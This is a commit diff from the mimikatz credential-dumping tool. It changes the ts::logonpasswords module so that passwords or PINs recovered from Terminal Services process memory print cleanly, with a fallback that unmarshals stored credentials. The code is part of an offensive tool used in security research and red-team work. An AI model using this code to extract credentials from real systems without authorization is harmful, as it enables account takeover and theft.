[fix] mimikatz ts::logonpassword removed junk data after credentials

2025-01-30 08:51:32 +00:00 · 2021-08-10 17:21:25 +02:00 · 2021-08-10 17:21:25 +02:00 · 7f02230226
commit 7f02230226
parent d05fa5d43f
3 changed files with 5 additions and 4 deletions
--- a/mimikatz/modules/kuhl_m_ts.c
+++ b/mimikatz/modules/kuhl_m_ts.c
@ -315,10 +315,10 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
 									if(decStatus)
 									{
 										dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
-										kprintf(L"   Password/Pin: %s\n   |_ supp data: ", pWebKiwiData->Password.Buffer);
-										kull_m_string_wprintf_hex((PBYTE) pWebKiwiData->Password.Buffer + dwOffset, pWebKiwiData->Password.Length - dwOffset, 1);
-										kprintf(L"\n");
+										kprintf(L"   Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
 									}
+									else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
+
 									LocalFree(pWebKiwiData->Password.Buffer);
 								}
 							}
--- a/mimikatz/modules/kuhl_m_ts.h
+++ b/mimikatz/modules/kuhl_m_ts.h
@ -10,6 +10,7 @@
 #include "../../modules/kull_m_process.h"
 #include "../../modules/kull_m_memory.h"
 #include "../../modules/kull_m_crypto_remote.h"
+#include "sekurlsa/kuhl_m_sekurlsa.h"

 const KUHL_M kuhl_m_ts;

--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
 						kprintf(L"[UsernameForPacked] ?");
 						break;
 					default:
-						kprintf(L"[?] ?");
+						kprintf(L"[?] ? %u ?", type);
 					}
 					CredFree(Credential);
 				}